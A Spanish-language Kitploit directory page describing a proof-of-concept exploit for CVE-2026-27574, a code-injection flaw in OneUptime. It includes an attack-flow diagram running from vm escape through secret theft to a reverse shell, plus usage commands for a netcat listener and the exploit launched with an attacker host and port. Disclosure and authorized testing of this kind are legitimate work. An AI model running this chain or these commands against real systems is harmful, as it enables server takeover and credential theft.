Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/mbanyamer/cve-2026-27574-oneuptime-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubmbanyamer/cve-2026-27574-oneuptime-rce

CVE-2026-27574-OneUptime-RCE

Prueba de concepto de exploit para CVE-2026-27574, una inyección de código crítica en OneUptime que permite la ejecución remota de código y la fuga de variables de entorno.

Ver Repositorio
1hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-27574-OneUptime-RCE

Author Role Country Platform Vulnerability CVE CVSS Status

Descripción general

Exploit de prueba de concepto para CVE-2026-27574 – una vulnerabilidad crítica de inyección de código (CWE-94) en OneUptime < 10.0.0 que permite la ejecución arbitraria de JavaScript en el contexto del probe, lo que conduce a una completa y a la filtración de variables de entorno sensibles.

ejecución remota de código (RCE)

Corregido en: OneUptime 10.0.0 (migración a isolated-vm)

Tipo de exploit: Remoto
Autenticación: Privilegios bajos (cualquier miembro registrado del proyecto)
Impacto: Compromiso total del servidor, robo de credenciales, toma de control del clúster

Diagrama del flujo de ataque

root@kitploit:~
flowchart TD
    A[Start] --> B[Open Registration]
    B --> C[Register New Account]
    C --> D[Create New Project]
    D --> E[Obtain ProjectMember Role]
    E --> F[Create Custom JavaScript Monitor]
    F --> G[Inject Malicious vm Escape Payload]
    G --> H[Probe Executes Code Every ~60s]
    H --> I[Escape vm Context via constructor chain]
    I --> J[Access process & child_process]
    J --> K[Execute System Commands]
    J --> L[Leak Environment Variables]
    K --> M[Read /etc/passwd, id, hostname, etc.]
    L --> N[Extract ONEUPTIME_SECRET, DB/Redis passwords, etc.]
    M --> O[Full RCE Achieved]
    N --> O
    O --> P[Optional: Reverse Shell / Data Exfiltration]
    P --> Q[End - System Compromised]

Características de este PoC

  • Registro automático de cuentas
  • Creación de proyectos
  • Creación de monitores JavaScript maliciosos
  • Filtración de variables de entorno
  • Prueba básica de ejecución de comandos
  • Payload opcional de reverse shell (comentado)

Uso

root@kitploit:~
# Iniciar listener (si se usa reverse shell)
nc -lvnp 4444

# Ejecutar el exploit
python3 exploit.py http://target:3002 --lhost TU_IP --lport 4444

Requisitos

  • Python 3.6+
  • Librería requests (pip install requests)

Aviso legal y ético

Este código se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
El uso no autorizado contra sistemas que no posees o para los que no tienes permiso explícito de prueba es ilegal y poco ético.

Referencias

  • Aviso de GitHub GHSA-v264-xqh4-9xmm
  • Commit del parche

Desarrollado por Mohammed Idrees Banyamer • Jordania • @banyamer_security

Descargar herramienta